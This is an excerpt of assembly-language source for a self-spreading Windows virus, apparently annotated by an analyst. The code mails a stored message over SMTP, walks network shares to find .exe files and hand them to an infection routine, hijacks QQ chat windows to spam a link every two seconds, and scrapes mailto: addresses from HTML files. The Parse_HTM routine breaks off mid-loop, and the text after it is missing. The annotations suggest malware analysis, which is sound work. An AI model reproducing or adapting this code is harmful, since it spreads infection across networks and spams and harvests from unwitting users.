push esi
call _send[ebx]
jmp Next
szRcpt db "RCPT TO: <%s>",0dh,0ah,0
Rcpt db 80 dup(0)
Next:
push eMail
lea ecx,[offset szRcpt+ebx]
push ecx
lea ecx,[offset Rcpt+ebx]
push ecx
call _wsprintf[ebx]
add esp,0ch
lea ecx,[offset Rcpt+ebx]
push ecx
call _lstrlen[ebx]
push 0
push eax
lea ecx,[offset Rcpt+ebx]
push ecx
push esi
call _send[ebx]
push 0
push 6
call vData
db "DATA",0dh,0ah
vData:
push esi
call _send[ebx]
push MAX_PATH
call szSysDir
SysDir db MAX_PATH dup(0)
szSysDir:
call _GetSystemDirectory[ebx]
call szfile
db "\hello.eml",0
szfile :
lea ecx,[offset SysDir+ebx]
push ecx
call _lstrcat[ebx]
push NULL
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push NULL
push FILE_SHARE_READ
push GENERIC_READ OR GENERIC_WRITE
lea ecx,[offset SysDir+ebx]
push ecx
call _CreateFile[ebx]
mov hFile1[ebx],eax
cmp eax,INVALID_HANDLE_VALUE
jz SM_ret
push NULL
push hFile1[ebx]
call _GetFileSize[ebx]
push esi ;保存套接字
mov esi,eax
push PAGE_READWRITE
push MEM_COMMIT
push esi
push NULL
call _VirtualAlloc[ebx]
mov edi,eax
push 0
lea ecx,[offset dwRead+ebx]
push ecx ;最終讀出的字節數
push esi ;需要讀出的字節數
push edi ;數據緩沖區
push hFile1[ebx]
call _ReadFile[ebx]
pop esi ;恢復套接字
mov ecx,DWORD ptr dwRead[ebx]
re2:
sub ecx,1000
jb ex
push ecx
push 0
push 1000
push edi
push esi ;套接字
call _send[ebx]
add edi,1000
pop ecx
jmp re2
ex:
add ecx,1000
push 0
push ecx
push edi
push esi
call _send[ebx]
push 0
push 5
call szEndData
db 0dh,0ah, ".",0dh,0ah,0
szEndData:
push esi
call _send[ebx]
push 4000
call _Sleep[ebx]
push 0
push 6
call szQuit
db "QUIT",0dh,0ah,0
szQuit:
push esi
call _send[ebx]
push 4000
call _Sleep[ebx]
SM_ret:
push hFile1[ebx]
call _CloseHandle[ebx]
push esi
call _closesocket[ebx]
call _WSACleanup[ebx]
popad
ret
SendMail endp
myCallBack dd 0 ;pointer to the routine EnumNetObject calls for every NETRESOURCE it receives;
;               each enumeration level (EnumNetBoot/EnumNetWorkGroup/EnumNetComputer/
;               EnumNetComputerShareDir) stores the next level's address here before calling EnumNetObject.
;               All globals in this file are addressed as name[ebx]; ebx appears to hold a load-time
;               base/delta for the relocated virus body (assumption — set outside this chunk).
EnumNetBoot proc ;start of the network-share walk: enumerate from the network root
;Level 1 of the chain root -> workgroups -> computers -> shares -> EnumFileObject.
;In:  ebx = base added to every global reference (see myCallBack)
;Out: none; every register restored by pushad/popad
pushad
mov ebp,NULL ;ebp = parent NETRESOURCE; NULL means "enumerate from the network root"
mov eax,RESOURCEUSAGE_CONTAINER ;eax = dwUsage filter that EnumNetObject passes to WNetOpenEnumA
lea ecx,[offset EnumNetWorkGroup+ebx]
mov DWORD ptr myCallBack[ebx],ecx ;next level: EnumNetWorkGroup is called once per container found
call EnumNetObject
popad
ret
EnumNetBoot endp
EnumNetWorkGroup proc ;level 2 callback: enumerate the computers inside one workgroup
;In:  ebp = NETRESOURCE of the workgroup just returned by WNetEnumResourceA
;            (points into EnumNetObject's stack buffer)
;Only ecx is saved explicitly; EnumNetObject itself is pushad/popad-wrapped, so the
;push/pop ecx pair is presumably defensive (ecx is not live in the caller's loop).
push ecx
mov eax,RESOURCEUSAGE_CONTAINER ;dwUsage: still looking for containers (computers)
lea ecx,[offset EnumNetComputer+ebx]
mov DWORD ptr myCallBack[ebx],ecx ;next level: EnumNetComputer
call EnumNetObject
pop ecx
ret
EnumNetWorkGroup endp
EnumNetComputer proc ;level 3 callback: enumerate the shares exported by one computer
;In:  ebp = NETRESOURCE of the computer just returned by WNetEnumResourceA
;Same shape as EnumNetWorkGroup; only the usage filter and the next callback differ.
push ecx
mov eax,RESOURCEUSAGE_CONTAINER ;dwUsage: the computer is a container of shares
lea ecx,[offset EnumNetComputerShareDir+ebx]
mov DWORD ptr myCallBack[ebx],ecx ;next level: EnumNetComputerShareDir
call EnumNetObject
pop ecx
ret
EnumNetComputer endp
EnumNetComputerShareDir proc ;level 4 callback: enumerate the connectable shares of one computer
;In:  ebp = NETRESOURCE of the computer (parent of the shares)
;Switches the usage filter to CONNECTABLE so that the next callback (DisplayMsg)
;receives shares that can be mounted/entered rather than further containers.
push ecx
mov eax,RESOURCEUSAGE_CONNECTABLE ;dwUsage: leaf shares only
lea ecx,[offset DisplayMsg+ebx]
mov DWORD ptr myCallBack[ebx],ecx ;next level: DisplayMsg (which walks the share's file tree)
call EnumNetObject
pop ecx
ret
EnumNetComputerShareDir endp
DisplayMsg proc ;leaf callback: despite the name it displays nothing — it descends into the share
;In:  ebp = NETRESOURCE of a connectable share
;Effect: EnumFileObject is entered with ebp = the share's lpRemoteName, so the whole
;        remote directory tree is walked and every *.exe reaches FoundFileObject.
push ebp
assume ebp:ptr NETRESOURCE
mov eax,[ebp].lpRemoteName ;eax/edi are loaded but not consumed here; EnumFileObject saves/restores all regs
mov edi,[ebp].lpProvider
mov ebp,[ebp].lpRemoteName ;ebp = remote name of the share = directory EnumFileObject will SetCurrentDirectory to
call EnumFileObject
pop ebp
ret
DisplayMsg endp
;//Generic LAN enumerator: opens a WNet enumeration below a parent resource and calls
;//myCallBack once per NETRESOURCE returned. Used for every level of the share walk.
EnumNetObject proc
;In:  eax = dwUsage filter (RESOURCEUSAGE_CONTAINER / RESOURCEUSAGE_CONNECTABLE)
;     ebp = parent NETRESOURCE (NULL = network root)
;     ebx = global base; the callback is taken from myCallBack[ebx], not from ebx itself
;     (the original header comment claimed ebx held the callback — that is stale)
;Out: none; all registers restored. Callback is entered with ebp = &NETRESOURCE (stack buffer),
;     esi = hEnum; the callback must leave ebp/esi/esp intact.
pushad
push eax ;placeholder dword that WNetOpenEnumA fills with hEnum
push esp ;lphEnum -> that placeholder
push ebp ;lpNetResource = parent
push eax ;dwUsage
push RESOURCETYPE_DISK ;dwType
push RESOURCE_GLOBALNET ;dwScope
call _WNetOpenEnumA[ebx] ;WNetOpenEnumA(dwScope,dwType,dwUsage,lpNetResource,lphEnum)
pop esi ;//esi = hEnum (pops the placeholder, rebalancing the stack)
or eax,eax
jnz short EnumNetObjectError ;non-zero = not NO_ERROR -> leave without a handle
sub esp,100h
mov ebp,esp ;//ebp = 100h-byte NETRESOURCE receive buffer carved from the stack
LoopEnumNetObject:
mov eax,1
push eax
;//lpcCount slot = 1: fetch a single entry per call
mov eax,esp ;eax = &lpcCount
push 100h ;//lpBufferSize slot = 100h (the "edi=100h" in the original comment is stale; edi is not used)
push esp ;lpBufferSize -> that slot
push ebp ;lpBuffer
push eax ;lpcCount
push esi ;hEnum
call _WNetEnumResourceA[ebx] ;WNetEnumResourceA(hEnum,lpcCount,lpBuffer,lpBufferSize)
pop edi
pop edi ;//discard the two value slots (buffer size, count)
or eax,eax
jnz short EnumNetObjectOver ;non-zero: ERROR_NO_MORE_ITEMS or a failure — either way stop
call myCallBack[ebx] ;//invoke the current level's callback with ebp = the NETRESOURCE just received
jmp short LoopEnumNetObject
EnumNetObjectOver:
push esi
call _WNetCloseEnum[ebx]
add esp,100h ;release the NETRESOURCE buffer
EnumNetObjectError:
popad
ret
EnumNetObject endp
;//Recursive directory walker for a local directory or a network share: enters the
;//directory, iterates it with FindFirstFile/FindNextFile, recurses into subdirectories
;//and hands every plain file to FoundFileObject.
EnumFileObject proc
;In:  ebp = path of the directory to walk (parent directory buffer / share remote name)
;Out: none; all registers restored by pushad/popad. The current directory is changed to
;     the target and restored with ".." afterwards (relative restore, not the saved path).
pushad
push ebp
call _SetCurrentDirectoryA[ebx] ;SetCurrentDirectoryA(ebp)
or eax,eax
jz SetDirError ;could not enter the directory -> nothing to do
mov edi,100h
sub esp,edi ;//carve a 100h-byte stack buffer (the original comment said 200h; the code reserves 100h)
;NOTE(review): sizeof(WIN32_FIND_DATAA) is 320 bytes (140h), larger than this buffer, so the
;find APIs may write past it into the pushad save area / return address. Verify before
;reasoning about this sample's reliability; it is a latent defect in the walker itself.
mov DWORD ptr [esp],2a2e2ah ;//build "*.*",0 in place (little-endian 2a 2e 2a 00)
mov eax,esp ;eax = lpFileName = "*.*"
push esp ;lpFindFileData = the same buffer (overlaid by WIN32_FIND_DATA)
push eax
call _FindFirstFile[ebx]
mov esi,eax ;esi = hFind
inc eax
jz short EnumFileObjectError ;INVALID_HANDLE_VALUE (-1) -> skip
LoopEnumFileObject:
;the entry produced by FindFirstFile itself is never examined; the loop starts with FindNextFile
push esp
push esi
call _FindNextFile[ebx]
;invoke FindNextFileA,esi,esp
or eax,eax
jz short EnumFileObjectOver ;no more entries
mov edi,esp
assume edi:ptr WIN32_FIND_DATA
lea ebp,[edi].cFileName ;ebp = name without path, the argument for the recursive call / FoundFileObject
mov eax,[edi].dwFileAttributes
and eax,10h ;//FILE_ATTRIBUTE_DIRECTORY
jz short IsFileObject
IsDirObject: ;//entry is a directory
mov eax,DWORD ptr [ebp]
cmp al,"." ;//skip "." and ".." (any name beginning with '.')
jz short LoopEnumFileObject
call EnumFileObject ;//recurse into the subdirectory (ebp = its name, relative to the current dir)
jmp short LoopEnumFileObject
IsFileObject: ;//entry is a plain file
call FoundFileObject ;//examine the file (only *.exe is acted on)
jmp short LoopEnumFileObject
EnumFileObjectOver:
push esi
call _CloseHandle[ebx] ;search handles are meant to be released with FindClose; CloseHandle is what the sample does
EnumFileObjectError:
mov DWORD ptr [esp],2e2eh ;//build "..",0 in place and step back to the parent directory
push esp
call _SetCurrentDirectoryA[ebx]
add esp,100h ;//release the stack buffer
SetDirError:
popad
ret
EnumFileObject endp
FoundFileObject proc ;filter: if the file name ends in ".exe" (case-insensitive), build its full path and call InfectFile
;//In:  ebp = file name without path (cFileName of the current find record)
;Out: none; all registers restored by pushad/popad. CurrentDirectory (inline buffer) is overwritten.
pushad
mov edi,ebp
xor eax,eax ;al = 0: the terminator being searched for
LoopFindExtName:
inc edi ;scan starts at ebp+1, so a zero-length name is never handled here
cmp [edi],al
jnz LoopFindExtName ;edi = address of the terminating NUL
mov eax,DWORD ptr[edi-4] ;last four characters of the name
or eax,20202020h ;fold ASCII letters to lower case
cmp eax,"exe." ;MASM multi-char literal: equals the bytes ".exe" in memory order
jnz NotExeFile
call szCurrentDirectory ;pushes the address of the inline CurrentDirectory buffer (lpBuffer)
CurrentDirectory db MAX_PATH dup (0)
szCurrentDirectory:
push MAX_PATH ;nBufferLength
call _GetCurrentDirectoryA[ebx] ;GetCurrentDirectoryA(MAX_PATH, CurrentDirectory)
call szA ;pushes the address of "\" (lpString2)
db "\",0
szA:
lea ecx,[offset CurrentDirectory+ebx]
push ecx ;lpString1
call _lstrcat[ebx] ;CurrentDirectory += "\"
push ebp ;lpString2 = file name
push ecx ;lpString1 = CurrentDirectory; relies on ecx surviving lstrcat (ecx is caller-saved under stdcall — fragile)
call _lstrcat[ebx] ;CurrentDirectory += name  -> full path of the .exe
push ecx ;full path, again assuming ecx is intact
call InfectFile ;InfectFile is defined outside this chunk
NotExeFile:
popad
ret
FoundFileObject endp
;************************************
;Resolve the WNet* entry points from MPR.DLL at run time
;(LoadLibraryA + GetProcAddress into inline dd slots; the import-free resolution
;of mpr.dll!WNetOpenEnumA/WNetEnumResourceA/WNetCloseEnum is a useful static/dynamic signature)
;************************************
GetMprFunction proc
;In:  ebx = global base; _LoadLibraryA/_GetProcAddress must already be resolved
;Out: _WNetOpenEnumA, _WNetEnumResourceA, _WNetCloseEnum filled in (0 if GetProcAddress fails;
;     a failed LoadLibraryA is not checked, so edi may be NULL on the GetProcAddress calls)
pushad
call szMpr ;pushes the address of "mpr.dll" (lpLibFileName)
db "mpr.dll",0
szMpr:
call _LoadLibraryA[ebx]
mov edi,eax ;edi = hModule of mpr.dll
call szWNetOpenEnum ;pushes the address of the proc name (lpProcName)
db "WNetOpenEnumA",0
_WNetOpenEnumA dd 0 ;slot filled below
szWNetOpenEnum:
push edi ;hModule
call _GetProcAddress[ebx]
mov DWORD ptr _WNetOpenEnumA[ebx],eax
call szWNetEnumResourceA
db "WNetEnumResourceA",0
_WNetEnumResourceA dd 0 ;slot filled below
szWNetEnumResourceA:
push edi
call _GetProcAddress[ebx]
mov DWORD ptr _WNetEnumResourceA[ebx],eax
call szWNetCloseEnum
db "WNetCloseEnum",0
_WNetCloseEnum dd 0 ;slot filled below
szWNetCloseEnum:
push edi
call _GetProcAddress[ebx]
mov DWORD ptr _WNetCloseEnum[ebx],eax
popad
ret
GetMprFunction endp
;***********************************
;Thread that injects a fixed message into the QQ "send message" dialog
;(guarded by the named mutex "logincom" so only one instance runs)
;***********************************
QQ_Thread proc uses ebx esi edi Param:DWORD
;In:  Param is unused; ebx = global base. MASM emits the frame/USES prologue and epilogue.
;Out: never returns while the target window exists (infinite loop with Sleep(2000));
;     returns only if the mutex already exists or the window/button cannot be found.
;Detection notes: mutex name "logincom"; FindWindowA by caption, FindWindowExA for a
;"RICHEDIT" child and a button captioned "送訊息(&S)"; WM_SETTEXT followed by BM_CLICK every 2 s.
pushad
call szMutex ;pushes the address of MutexName (lpName)
MutexName db "logincom",0
szMutex:
push FALSE ;bInheritHandle
push NULL ;dwDesiredAccess = 0
call _OpenMutex[ebx] ;OpenMutex(0, FALSE, "logincom")
or eax,eax
jnz QQ_ret ;mutex already exists -> another instance is running, exit
lea ecx,[offset MutexName+ebx]
push ecx ;lpName
push FALSE ;bInitialOwner
push NULL ;lpMutexAttributes
call _CreateMutex[ebx] ;CreateMutex(NULL, FALSE, "logincom"); the handle is never stored or closed
;********************************
;message-sending loop
;********************************
re4:
call szWincap ;pushes the address of the window caption (lpWindowName)
db "發送消息",0
szSend db "送訊息(&S)",0
szMsg db "最感人的故事,最煽情的文章.一切盡在",0dh,0ah
db "http://www.xxx.net/index.htm",0
szClass db "RICHEDIT",0
QQSend dd 0 ;hwnd of the target dialog
hEdit dd 0 ;hwnd of its RICHEDIT child
hSend dd 0 ;hwnd of its send button
szWincap:
push NULL ;lpClassName
call _FindWindowA[ebx] ;FindWindowA(NULL, caption)
mov DWORD ptr QQSend[ebx],eax
or eax,eax
jz QQ_ret ;dialog not open -> exit the thread
push 0 ;lpszWindow
lea ecx,[offset szClass+ebx]
push ecx ;lpszClass = "RICHEDIT"
push NULL ;hwndChildAfter
push QQSend[ebx] ;hwndParent
call _FindWindowExA[ebx]
mov DWORD ptr hEdit[ebx],eax ;not checked for NULL before use below
lea ecx,[offset szSend+ebx]
push ecx ;lpszWindow = button caption
push NULL ;lpszClass
push NULL ;hwndChildAfter
push QQSend[ebx]
call _FindWindowExA[ebx]
mov DWORD ptr hSend[ebx],eax
or eax,eax
jz QQ_ret ;send button not found -> exit
lea ecx,[offset szMsg+ebx]
push ecx ;lParam = text
push 0 ;wParam
push WM_SETTEXT
push hEdit[ebx]
call _SendMessageA[ebx] ;put the message into the edit control
push 0
push 0
push BM_CLICK
push hSend[ebx]
call _SendMessageA[ebx] ;press the send button
push 2000
call _Sleep[ebx] ;2 s between messages
jmp re4
QQ_ret:
popad
ret
QQ_Thread endp
;*****************************************
;分析MailFileName(*.htm*),尋找Mail_Addr.
;pkxp的代碼
;*****************************************
Parse_HTM PROC htmFileName :DWORD
LOCAL hFile : DWORD
LOCAL hMapping : DWORD
LOCAL SafeFSize: DWORD
pushad
push 0
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push 0
push FILE_SHARE_READ
push GENERIC_READ
push htmFileName
call _CreateFile[ebx]
or eax,eax
jz PH_Exit
mov hFile , eax
xor eax,eax
push eax
push eax
push eax
push PAGE_READONLY
push eax
push hFile
call _CreateFileMapping[ebx]
or eax,eax
jz PH_Close
mov hMapping,eax
xor eax,eax
push eax
push eax
push eax
push FILE_MAP_READ
push hMapping
call _MapViewOfFile[ebx]
or eax,eax
jz PH_Close2
xchg eax,esi ;esi = pMapping
push 0
push hFile
call _GetFileSize[ebx]
sub eax,16 ;For security
add eax,esi
mov SafeFSize,eax ;esi必須小于SafeFSize
.while esi < SafeFSize
push esi
xor edx,edx ;Valid = FALSE
@pushsz "mailto:"
pop edi
push 7 ;"mailto:" 字符串長度
pop ecx
repz cmpsb
.if zero? ;找到 mailto:
lea edi,[offset TempMailTo+ebx]
push edi
.while esi
;Uninitialised global storage at the end of the virus body (all referenced as name[ebx]).
;The text between the Parse_HTM loop above and this block is missing from this page.
sock sockaddr_in <0> ;socket address used by the mail-sending code
wfd WIN32_FIND_DATA <0> ;find record
hProcess dd 0
_GetProcessAddress dd 0 ;resolved API pointer slot
hMem dd 0
E8_addr dd 0
VirusLen=$-offset VStart ;size of the whole body, measured from the VStart label (outside this chunk)
VEnd:
End VStart ;entry point